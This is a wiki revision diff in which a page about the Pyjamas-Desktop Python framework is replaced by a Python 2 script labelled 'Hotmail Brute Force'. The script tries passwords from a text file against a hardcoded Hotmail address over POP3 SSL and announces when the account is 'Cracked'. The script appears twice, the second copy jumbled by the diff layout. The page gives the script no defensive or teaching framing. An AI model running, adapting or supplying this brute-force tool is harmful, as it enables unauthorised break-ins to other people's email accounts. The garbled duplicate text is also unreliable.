Size: 329
Comment:
|
Size: 865
Comment:
|
Deletions are marked like this. | Additions are marked like this. |
Line 1: | Line 1: |
Pyjamas-Desktop is a cross-platform framework and applications widget set, based on [http://webkit.org WebKit]. PyWebkitGtk is currently the basis for Pyjamas-Desktop, and it is conceivable that there will exist a PyWebkitQt4, and Pyjamas-Desktop will run on top of that, as well. | import poplib from winsound import Beep print ''' ======================================== | Hotmail Brute Force | | Str1k3r | | h4moud@hotmail.com | | Iam Hamoud \ thanks for Ricardo | | [Str1k3r,nj] | ========================================''' print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n" def con(pwd): M = poplib.POP3_SSL('pop3.live.com', 995) try: M.user("t2-@hotmail.com") M.pass_(pwd) except: print "[-]password incorrect" else: print '[+]Email Has been Cracked!','\n[+]Password:', pwd Beep(3000,800) exit() |
Line 3: | Line 24: |
[http://code.google.com/p/pyjamas Pyjamas] | f = open("Str1k3r.txt", "r") for pwd in f.readlines(): con(pwd.replace("\r", "").replace("\n", "")) |
import poplib from winsound import Beep print ======================================== | Hotmail Brute Force | | Str1k3r | | h4moud@hotmail.com | | Iam Hamoud \ thanks for Ricardo | | [Str1k3r,nj] | ======================================== print "[~]Make TXT file Str1k3r.txt and put the password \n[~]and make sure it's on the seem programe folder\n" def con(pwd):
- M = poplib.POP3_SSL('pop3.live.com', 995) try:
M.user("t2-@hotmail.com") M.pass_(pwd)
- print "[-]password incorrect"
- print '[+]Email Has been Cracked!','\n[+]Password:', pwd Beep(3000,800) exit()
f = open("Str1k3r.txt", "r") for pwd in f.readlines():
- con(pwd.replace("\r", "").replace("\n", ""))